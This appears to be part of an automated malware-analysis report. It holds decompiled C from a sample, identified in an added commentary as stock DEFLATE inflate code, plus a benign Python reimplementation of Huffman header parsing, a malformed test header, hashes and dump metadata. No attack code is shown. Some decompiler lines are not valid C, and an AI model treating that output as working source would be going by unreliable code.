                											__ecx = __esi[0x26e8];
                											__eflags = __edi - __ecx;
                											if(__edi != __ecx) {
                												L163:
                												__esi[0x26ea] = __edi;
                												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                												__edi = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edi - __ecx;
                												 *(__ebp - 0x30) = __edi;
                												if(__edi >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edi;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edi;
                													__eax = __ecx - __edi - 1;
                												}
                												__edx = __esi[0x26e8];
                												__eflags = __edi - __edx;
                												 *(__ebp - 8) = __edx;
                												if(__edi == __edx) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __ecx - __edx;
                													if(__ecx != __edx) {
                														__edi = __edx;
                														__eflags = __edi - __ecx;
                														 *(__ebp - 0x30) = __edi;
                														if(__edi >= __ecx) {
                															__eax =  *(__ebp - 8);
                															__eax =  *(__ebp - 8) - __edi;
                															__eflags = __eax;
                														} else {
                															__ecx = __ecx - __edi;
                															__eax = __ecx;
                														}
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L183;
                												} else {
                													goto L172;
                												}
                											}
                											L158:
                											__eax = __esi[0x26e9];
                											__edx =  &(__esi[0x6e8]);
                											__eflags = __eax - __edx;
                											if(__eax == __edx) {
                												goto L163;
                											}
                											L159:
                											__edi = __edx;
                											__eflags = __edi - __eax;
                											if(__edi >= __eax) {
                												__ecx = __ecx - __edi;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edi;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L172;
                											} else {
                												goto L163;
                											}
                										case 7:
                											L173:
                											__eflags = __ebx - 7;
                											if(__ebx > 7) {
                												__ebx = __ebx - 8;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                												_t380 = __ebp - 0x38;
                												 *_t380 =  *(__ebp - 0x38) - 1;
                												__eflags =  *_t380;
                											}
                											goto L175;
                										case 8:
                											L4:
                											while(_t425 < 3) {
                												if( *(_t448 - 0x34) == 0) {
                													goto L182;
                												} else {
                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                													_t425 = _t425 + 8;
                													continue;
                												}
                											}
                											_t425 = _t425 - 3;
                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                											asm("sbb ecx, ecx");
                											_t408 = _t406 >> 1;
                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                											if(_t408 == 0) {
                												L24:
                												 *_t446 = 9;
                												_t436 = _t425 & 0x00000007;
                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                												_t425 = _t425 - _t436;
                												goto L180;
                											}
                											L6:
                											_t411 = _t408 - 1;
                											if(_t411 == 0) {
                												L13:
                												__eflags =  *0x42e3a8;
                												if( *0x42e3a8 != 0) {
                													L22:
                													_t412 =  *0x40a42c; // 0x9
                													_t446[4] = _t412;
                													_t413 =  *0x40a430; // 0x5
                													_t446[4] = _t413;
                													_t414 =  *0x42d224; // 0x0
                													_t446[5] = _t414;
                													_t415 =  *0x42d220; // 0x0
                													_t446[6] = _t415;
                													L23:
                													 *_t446 =  *_t446 & 0x00000000;
                													goto L180;
                												} else {
                													_t26 = _t448 - 8;
                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                													__eflags =  *_t26;
                													_t416 = 0x42d228;
                													goto L15;
                													L20:
                													 *_t416 = _t438;
                													_t416 = _t416 + 4;
                													__eflags = _t416 - 0x42d6a8;
                													if(_t416 < 0x42d6a8) {
                														L15:
                														__eflags = _t416 - 0x42d464;
                														_t438 = 8;
                														if(_t416 > 0x42d464) {
                															__eflags = _t416 - 0x42d628;
                															if(_t416 >= 0x42d628) {
                																__eflags = _t416 - 0x42d688;
                																if(_t416 < 0x42d688) {
                																	_t438 = 7;
                																}
                															} else {
                																_t438 = 9;
                															}
                														}
                														goto L20;
                													} else {
                														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
                														_push(0x1e);
                														_pop(_t440);
                														_push(5);
                														_pop(_t419);
                														memset(0x42d228, _t419, _t440 << 2);
                														_t450 = _t450 + 0xc;
                														_t442 = 0x42d228 + _t440;
                														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
                														 *0x42e3a8 =  *0x42e3a8 + 1;
                														__eflags =  *0x42e3a8;
                														goto L22;
                													}
                												}
                											}
                											L7:
                											_t423 = _t411 - 1;
                											if(_t423 == 0) {
                												 *_t446 = 0xb;
                												goto L180;
                											}
                											L8:
                											if(_t423 != 1) {
                												goto L180;
                											}
                											goto L9;
                										case 9:
                											while(1) {
                												L27:
                												__eflags = __ebx - 0x20;
                												if(__ebx >= 0x20) {
                													break;
                												}
                												L25:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L26:
                												__eax =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__ecx = __ebx;
                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L28:
                											__eax =  *(__ebp - 0x40);
                											__ebx = 0;
                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                											 *(__ebp - 0x40) = 0;
                											__eflags = __eax;
                											__esi[1] = __eax;
                											if(__eax == 0) {
                												goto L53;
                											}
                											L29:
                											_push(0xa);
                											_pop(__eax);
                											goto L54;
                										case 0xa:
                											L30:
                											__eflags =  *(__ebp - 0x34);
                											if( *(__ebp - 0x34) == 0) {
                												goto L182;
                											}
                											L31:
                											__eax =  *(__ebp - 0x2c);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L48:
                												__eflags = __eax -  *(__ebp - 0x34);
                												if(__eax >=  *(__ebp - 0x34)) {
                													__eax =  *(__ebp - 0x34);
                												}
                												__ecx = __esi[1];
                												__eflags = __ecx - __eax;
                												__edi = __ecx;
                												if(__ecx >= __eax) {
                													__edi = __eax;
                												}
                												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                												_t80 =  &(__esi[1]);
                												 *_t80 = __esi[1] - __edi;
                												__eflags =  *_t80;
                												if( *_t80 == 0) {
                													L53:
                													__eax = __esi[0x145];
                													L54:
                													 *__esi = __eax;
                												}
                												goto L180;
                											}
                											L32:
                											__ecx = __esi[0x26e8];
                											__edx =  *(__ebp - 0x30);
                											__eflags = __edx - __ecx;
                											if(__edx != __ecx) {
                												L38:
                												__esi[0x26ea] = __edx;
                												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                												__edx = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edx - __ecx;
                												 *(__ebp - 0x30) = __edx;
                												if(__edx >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edx;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edx;
                													__eax = __ecx - __edx - 1;
                												}
                												__edi = __esi[0x26e8];
                												 *(__ebp - 0x2c) = __eax;
                												__eflags = __edx - __edi;
                												if(__edx == __edi) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __edx - __ecx;
                													if(__eflags != 0) {
                														 *(__ebp - 0x30) = __edx;
                														if(__eflags >= 0) {
                															__edi = __edi - __edx;
                															__eflags = __edi;
                															__eax = __edi;
                														} else {
                															__ecx = __ecx - __edx;
                															__eax = __ecx;
                														}
                														 *(__ebp - 0x2c) = __eax;
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L183;
                												} else {
                													goto L48;
                												}
                											}
                											L33:
                											__eax = __esi[0x26e9];
                											__edi =  &(__esi[0x6e8]);
                											__eflags = __eax - __edi;
                											if(__eax == __edi) {
                												goto L38;
                											}
                											L34:
                											__edx = __edi;
                											__eflags = __edx - __eax;
                											 *(__ebp - 0x30) = __edx;
                											if(__edx >= __eax) {
                												__ecx = __ecx - __edx;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edx;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											 *(__ebp - 0x2c) = __eax;
                											if(__eax != 0) {
                												goto L48;
                											} else {
                												goto L38;
                											}
                										case 0xb:
                											goto L56;
                										case 0xc:
                											L60:
                											__esi[1] = __esi[1] >> 0xa;
                											__eax = (__esi[1] >> 0xa) + 4;
                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                												goto L68;
                											}
                											goto L61;
                										case 0xd:
                											while(1) {
                												L93:
                												__eax = __esi[1];
                												__ecx = __esi[2];
                												__edx = __eax;
                												__eax = __eax & 0x0000001f;
                												__edx = __edx >> 5;
                												__eax = __edx + __eax + 0x102;
                												__eflags = __esi[2] - __eax;
                												if(__esi[2] >= __eax) {
                													break;
                												}
                												L73:
                												__eax = __esi[0x143];
                												while(1) {
                													L76:
                													__eflags = __ebx - __eax;
                													if(__ebx >= __eax) {
                														break;
                													}
                													L74:
                													__eflags =  *(__ebp - 0x34);
                													if( *(__ebp - 0x34) == 0) {
                														goto L182;
                													}
                													L75:
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                													__ecx = __ebx;
                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                													__ebx = __ebx + 8;
                													__eflags = __ebx;
                												}
                												L77:
                												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                												__eax = __eax &  *(__ebp - 0x40);
                												__ecx = __esi[0x144];
                												__eax = __esi[0x144] + __eax * 4;
                												__edx =  *(__eax + 1) & 0x000000ff;
                												__eax =  *(__eax + 2) & 0x0000ffff;
                												__eflags = __eax - 0x10;
                												 *(__ebp - 0x14) = __eax;
                												if(__eax >= 0x10) {
                													L79:
                													__eflags = __eax - 0x12;
                													if(__eax != 0x12) {
                														__eax = __eax + 0xfffffff2;
                														 *(__ebp - 8) = 3;
                													} else {
                														_push(7);
                														 *(__ebp - 8) = 0xb;
                														_pop(__eax);
                													}
                													while(1) {
                														L84:
                														__ecx = __eax + __edx;
                														__eflags = __ebx - __eax + __edx;
                														if(__ebx >= __eax + __edx) {
                															break;
                														}
                														L82:
                														__eflags =  *(__ebp - 0x34);
                														if( *(__ebp - 0x34) == 0) {
                															goto L182;
                														}
                														L83:
                														__ecx =  *(__ebp - 0x38);
                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                														__ecx = __ebx;
                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                														__ebx = __ebx + 8;
                														__eflags = __ebx;
                													}
                													L85:
                													__ecx = __edx;
                													__ebx = __ebx - __edx;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                													__edx =  *(__ebp - 8);
                													__ebx = __ebx - __eax;
                													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                													__ecx = __eax;
                													__eax = __esi[1];
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													__ecx = __esi[2];
                													__eax = __eax >> 5;
                													__edi = __eax >> 0x00000005 & 0x0000001f;
                													__eax = __eax & 0x0000001f;
                													__eax = __edi + __eax + 0x102;
                													__edi = __edx + __ecx;
                													__eflags = __edx + __ecx - __eax;
                													if(__edx + __ecx > __eax) {
                														goto L9;
                													}
                													L86:
                													__eflags =  *(__ebp - 0x14) - 0x10;
                													if( *(__ebp - 0x14) != 0x10) {
                														L89:
                														__edi = 0;
                														__eflags = 0;
                														L90:
                														__eax = __esi + 0xc + __ecx * 4;
                														do {
                															L91:
                															 *__eax = __edi;
                															__ecx = __ecx + 1;
                															__eax = __eax + 4;
                															__edx = __edx - 1;
                															__eflags = __edx;
                														} while (__edx != 0);
                														__esi[2] = __ecx;
                														continue;
                													}
                													L87:
                													__eflags = __ecx - 1;
                													if(__ecx < 1) {
                														goto L9;
                													}
                													L88:
                													__edi =  *(__esi + 8 + __ecx * 4);
                													goto L90;
                												}
                												L78:
                												__ecx = __edx;
                												__ebx = __ebx - __edx;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                												__ecx = __esi[2];
                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                												__esi[2] = __esi[2] + 1;
                											}
                											L94:
                											__eax = __esi[1];
                											__esi[0x144] = __esi[0x144] & 0x00000000;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                											__edi = __eax;
                											__eax = __eax >> 5;
                											__edi = __edi & 0x0000001f;
                											__ecx = 0x101;
                											__eax = __eax & 0x0000001f;
                											__edi = __edi + 0x101;
                											__eax = __eax + 1;
                											__edx = __ebp - 0xc;
                											 *(__ebp - 0x14) = __eax;
                											 &(__esi[0x148]) = __ebp - 4;
                											 *(__ebp - 4) = 9;
                											__ebp - 0x18 =  &(__esi[3]);
                											 *(__ebp - 0x10) = 6;
                											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                											__eflags =  *(__ebp - 4);
                											if( *(__ebp - 4) == 0) {
                												__eax = __eax | 0xffffffff;
                												__eflags = __eax;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L9;
                											} else {
                												L97:
                												__ebp - 0xc =  &(__esi[0x148]);
                												__ebp - 0x10 = __ebp - 0x1c;
                												__eax = __esi + 0xc + __edi * 4;
                												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                												__eflags = __eax;
                												if(__eax != 0) {
                													goto L9;
                												}
                												L98:
                												__eax =  *(__ebp - 0x10);
                												__eflags =  *(__ebp - 0x10);
                												if( *(__ebp - 0x10) != 0) {
                													L100:
                													__cl =  *(__ebp - 4);
                													 *__esi =  *__esi & 0x00000000;
                													__eflags =  *__esi;
                													__esi[4] = __al;
                													__eax =  *(__ebp - 0x18);
                													__esi[5] =  *(__ebp - 0x18);
                													__eax =  *(__ebp - 0x1c);
                													__esi[4] = __cl;
                													__esi[6] =  *(__ebp - 0x1c);
                													goto L101;
                												}
                												L99:
                												__eflags = __edi - 0x101;
                												if(__edi > 0x101) {
                													goto L9;
                												}
                												goto L100;
                											}
                										case 0xe:
                											goto L9;
                										case 0xf:
                											L175:
                											__eax =  *(__ebp - 0x30);
                											__esi[0x26ea] =  *(__ebp - 0x30);
                											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                											__ecx = __esi[0x26ea];
                											__edx = __esi[0x26e9];
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x30) = __ecx;
                											if(__ecx >= __edx) {
                												__eax = __esi[0x26e8];
                												__eax = __esi[0x26e8] - __ecx;
                												__eflags = __eax;
                											} else {
                												__edx = __edx - __ecx;
                												__eax = __edx - __ecx - 1;
                											}
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ecx != __edx) {
                												L183:
                												__edi = 0;
                												goto L10;
                											} else {
                												L179:
                												__eax = __esi[0x145];
                												__eflags = __eax - 8;
                												 *__esi = __eax;
                												if(__eax != 8) {
                													L184:
                													0 = 1;
                													goto L10;
                												}
                												goto L180;
                											}
                									}
                								}
                								L181:
                								goto L9;
                							}
                							L70:
                							if( *__edi == __eax) {
                								goto L72;
                							}
                							L71:
                							__esi[2] = __esi[2] & __eax;
                							 *__esi = 0xd;
                							goto L93;
                						}
                					}
                				}
                				L182:
                				_t443 = 0;
                				_t446[0x147] =  *(_t448 - 0x40);
                				_t446[0x146] = _t425;
                				( *(_t448 + 8))[1] = 0;
                				goto L11;
                			}
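The loop in the decompiled function above reads code lengths out of a bit buffer using exactly the constants of DEFLATE's code-length alphabet (RFC 1951 3.2.7): symbols below 0x10 are literal lengths, 0x10 repeats the previous length (base 3, two extra bits, rejected when there is no previous length), 0x11 and 0x12 emit runs of zero lengths (bases 3 and 0xb), the combined length table is bounded by 0x102 plus the two 5-bit HLIT/HDIST fields, and a run that overruns that bound jumps to the error path. That is what a stock inflate implementation does when it builds the dynamic Huffman tables, so this routine is most likely unpacker/installer boilerplate rather than the sample's own logic. The Python below is an added example, not code from the report or from the sample: it reimplements that stage over a raw DEFLATE stream so the checks can be compared side by side. The `BitReader`, `canonical_decoder`, `read_dynamic_block_lengths` and `analyse` names are this example's own, the input text is constructed, and the malformed header is hand-built to hit the overrun check.

```python
import zlib

# Order in which the code-length code's own lengths are transmitted (RFC 1951 3.2.7).
CLEN_ORDER = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]


class BitReader:
    """LSB-first bit reader, the bit order DEFLATE uses."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def bits(self, n):
        v = 0
        for i in range(n):
            v |= ((self.data[self.pos >> 3] >> (self.pos & 7)) & 1) << i
            self.pos += 1
        return v


def canonical_decoder(lengths):
    """Map (code length, code) -> symbol for a canonical Huffman code (RFC 1951 3.2.2)."""
    max_len = max(lengths)
    bl_count = [lengths.count(b) for b in range(max_len + 1)]
    bl_count[0] = 0                               # unused symbols take no code
    next_code, code = [0] * (max_len + 1), 0
    for b in range(1, max_len + 1):
        code = (code + bl_count[b - 1]) << 1
        next_code[b] = code
    table = {}
    for sym, l in enumerate(lengths):
        if l:
            table[(l, next_code[l])] = sym
            next_code[l] += 1
    return table


def decode_symbol(br, table):
    code = 0
    for length in range(1, 16):                   # Huffman codes are at most 15 bits long
        code = (code << 1) | br.bits(1)           # code bits arrive most-significant first
        if (length, code) in table:
            return table[(length, code)]
    raise ValueError("invalid Huffman code")


def read_dynamic_block_lengths(raw):
    """Parse one dynamic block header; return (lit/len lengths, dist lengths, bit offset)."""
    br = BitReader(raw)
    if br.bits(3) >> 1 != 2:                      # bit 0 is BFINAL, bits 1-2 are BTYPE
        raise ValueError("not a dynamic Huffman block")
    hlit, hdist, hclen = br.bits(5) + 257, br.bits(5) + 1, br.bits(4) + 4
    clen = [0] * 19
    for i in range(hclen):
        clen[CLEN_ORDER[i]] = br.bits(3)
    table, total, lengths = canonical_decoder(clen), hlit + hdist, []
    while len(lengths) < total:
        sym = decode_symbol(br, table)
        if sym < 16:                              # literal code length 0..15
            lengths.append(sym)
            continue
        if sym == 16:                             # repeat previous length 3..6 times
            if not lengths:
                raise ValueError("repeat (16) with no previous length")
            run, value = 3 + br.bits(2), lengths[-1]
        elif sym == 17:                           # 3..10 zero lengths
            run, value = 3 + br.bits(3), 0
        else:                                     # 18: 11..138 zero lengths
            run, value = 11 + br.bits(7), 0
        if len(lengths) + run > total:            # same bound the decompiled loop enforces
            raise ValueError("code length repeat overruns HLIT+HDIST")
        lengths.extend([value] * run)
    return lengths[:hlit], lengths[hlit:], br.pos


def kraft_scaled(lengths):
    """Sum of 2^-len scaled by 2^15: exactly 1<<15 for a complete prefix code."""
    return sum(1 << (15 - l) for l in lengths if l)


def constructed_sample():
    """Deterministic skewed-alphabet text (constructed) so zlib emits a dynamic block."""
    alphabet, x, out = b"aaaaaabbbbccdeeeeeefghijklmnoprsttttu ", 12345, bytearray()
    for _ in range(4000):
        x = (1103515245 * x + 12345) & 0x7fffffff
        out.append(alphabet[(x >> 16) % len(alphabet)])
    return bytes(out)


def analyse(data):
    c = zlib.compressobj(level=9, wbits=-15)      # raw DEFLATE, no zlib wrapper
    lit, dist, _ = read_dynamic_block_lengths(c.compress(data) + c.flush())
    return {"hlit": len(lit), "hdist": len(dist), "eob_coded": lit[256] != 0,
            "litlen_complete": kraft_scaled(lit) == 1 << 15,
            "dist_valid": kraft_scaled(dist) <= 1 << 15}


# Constructed malformed header: BFINAL=1, BTYPE=2, HLIT=257, HDIST=1, HCLEN=4 with symbol 18 -> '1'
# and symbol 0 -> '0', then symbol 18 with 127 extra bits twice (2 x 138 = 276 > 258 lengths).
MALFORMED_HEADER = bytes.fromhex("050080e4ff1f")


def rejects_overrun():
    try:
        read_dynamic_block_lengths(MALFORMED_HEADER)
        return False
    except ValueError as e:
        return "overruns" in str(e)
```

`analyse(constructed_sample())` reports whether the end-of-block symbol received a code and whether the literal/length code is complete (Kraft sum exactly 1), two properties every block zlib produces has; `rejects_overrun()` shows the hand-built header being refused on the same bound the decompiled code checks before its `goto L9`. When triaging a decompiled routine like the one above, recognising these constants is faster than stepping through it.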









                Instruction addresses 0x00406676 to 0x0040703e (the per-line address column that the original report renders next to the decompiled function above; the individual addresses are omitted here).
                0x00406b84
                0x00406b66
                0x00406b66
                0x00406b69
                0x00000000
                0x00000000
                0x00406b6f
                0x00406b6f
                0x00000000
                0x00406b6f
                0x00406ac5
                0x00406ac5
                0x00406ac7
                0x00406ac9
                0x00406acc
                0x00406acf
                0x00406ad3
                0x00406ad3
                0x00406ba7
                0x00406ba7
                0x00406baa
                0x00406bb1
                0x00406bb5
                0x00406bb7
                0x00406bba
                0x00406bbd
                0x00406bc2
                0x00406bc5
                0x00406bc7
                0x00406bc8
                0x00406bcb
                0x00406bd6
                0x00406bd9
                0x00406bf0
                0x00406bf5
                0x00406bfc
                0x00406c01
                0x00406c05
                0x00406c07
                0x00406c07
                0x00406c07
                0x00406c0a
                0x00406c0c
                0x00000000
                0x00406c12
                0x00406c12
                0x00406c16
                0x00406c21
                0x00406c34
                0x00406c39
                0x00406c3e
                0x00406c40
                0x00000000
                0x00000000
                0x00406c46
                0x00406c46
                0x00406c49
                0x00406c4b
                0x00406c59
                0x00406c59
                0x00406c5c
                0x00406c5c
                0x00406c5f
                0x00406c62
                0x00406c65
                0x00406c68
                0x00406c6b
                0x00406c6e
                0x00000000
                0x00406c6e
                0x00406c4d
                0x00406c4d
                0x00406c53
                0x00000000
                0x00000000
                0x00000000
                0x00406c53
                0x00000000
                0x00000000
                0x00000000
                0x00406ff2
                0x00406ff2
                0x00406ff8
                0x00406ffe
                0x00407003
                0x00407009
                0x0040700f
                0x00407011
                0x00407014
                0x0040701d
                0x00407023
                0x00407023
                0x00407016
                0x00407018
                0x0040701a
                0x0040701a
                0x00407025
                0x00407027
                0x0040702a
                0x00407065
                0x00407065
                0x00000000
                0x0040702c
                0x0040702c
                0x0040702c
                0x00407032
                0x00407035
                0x00407037
                0x0040706c
                0x0040706e
                0x00000000
                0x0040706e
                0x00000000
                0x00407037
                0x00000000
                0x00406676
                0x00407044
                0x00000000
                0x00407044
                0x00406a58
                0x00406a5a
                0x00000000
                0x00000000
                0x00406a5c
                0x00406a5c
                0x00406a5f
                0x00000000
                0x00406a5f
                0x004069a4
                0x00406965
                0x00407049
                0x0040704c
                0x0040704e
                0x00407057
                0x0040705d
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                				signed int _v8;
                				unsigned int _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				signed int _v28;
                				intOrPtr* _v32;
                				signed int* _v36;
                				signed int _v40;
                				signed int _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v116;
                				signed int _v176;
                				signed int _v180;
                				signed int _v240;
                				signed int _t166;
                				signed int _t168;
                				intOrPtr _t175;
                				signed int _t181;
                				void* _t182;
                				intOrPtr _t183;
                				signed int* _t184;
                				signed int _t186;
                				signed int _t187;
                				signed int* _t189;
                				signed int _t190;
                				intOrPtr* _t191;
                				intOrPtr _t192;
                				signed int _t193;
                				signed int _t195;
                				signed int _t200;
                				signed int _t205;
                				void* _t207;
                				short _t208;
                				signed char _t222;
                				signed int _t224;
                				signed int _t225;
                				signed int* _t232;
                				signed int _t233;
                				signed int _t234;
                				void* _t235;
                				signed int _t236;
                				signed int _t244;
                				signed int _t246;
                				signed int _t251;
                				signed int _t254;
                				signed int _t256;
                				signed int _t259;
                				signed int _t262;
                				void* _t263;
                				void* _t264;
                				signed int _t267;
                				intOrPtr _t269;
                				intOrPtr _t271;
                				signed int _t274;
                				intOrPtr* _t275;
                				unsigned int _t276;
                				void* _t277;
                				signed int _t278;
                				intOrPtr* _t279;
                				signed int _t281;
                				intOrPtr _t282;
                				intOrPtr _t283;
                				signed int* _t284;
                				signed int _t286;
                				signed int _t287;
                				signed int _t288;
                				signed int _t296;
                				signed int* _t297;
                				intOrPtr _t298;
                				void* _t299;
                
                				_t278 = _a8;
                				_t187 = 0x10;
                				memset( &_v116, 0, _t187 << 2);
                				_t189 = _a4;
                				_t233 = _t278;
                				do {
                					_t166 =  *_t189;
                					_t189 =  &(_t189[1]);
                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                					_t233 = _t233 - 1;
                				} while (_t233 != 0);
                				if(_v116 != _t278) {
                					_t279 = _a28;
                					_t267 =  *_t279;
                					_t190 = 1;
                					_a28 = _t267;
                					_t234 = 0xf;
                					while(1) {
                						_t168 = 0;
                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                							break;
                						}
                						_t190 = _t190 + 1;
                						if(_t190 <= _t234) {
                							continue;
                						}
                						break;
                					}
                					_v8 = _t190;
                					if(_t267 < _t190) {
                						_a28 = _t190;
                					}
                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                						_t234 = _t234 - 1;
                						if(_t234 != 0) {
                							continue;
                						}
                						break;
                					}
                					_v28 = _t234;
                					if(_a28 > _t234) {
                						_a28 = _t234;
                					}
                					 *_t279 = _a28;
                					_t181 = 1 << _t190;
                					while(_t190 < _t234) {
                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                						if(_t182 < 0) {
                							L64:
                							return _t168 | 0xffffffff;
                						}
                						_t190 = _t190 + 1;
                						_t181 = _t182 + _t182;
                					}
                					_t281 = _t234 << 2;
                					_t191 = _t299 + _t281 - 0x70;
                					_t269 =  *_t191;
                					_t183 = _t181 - _t269;
                					_v52 = _t183;
                					if(_t183 < 0) {
                						goto L64;
                					}
                					_v176 = _t168;
                					 *_t191 = _t269 + _t183;
                					_t192 = 0;
                					_t235 = _t234 - 1;
                					if(_t235 == 0) {
                						L21:
                						_t184 = _a4;
                						_t271 = 0;
                						do {
                							_t193 =  *_t184;
                							_t184 =  &(_t184[1]);
                							if(_t193 != _t168) {
                								_t232 = _t299 + _t193 * 4 - 0xb0;
                								_t236 =  *_t232;
                								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                								 *_t232 = _t236 + 1;
                							}
                							_t271 = _t271 + 1;
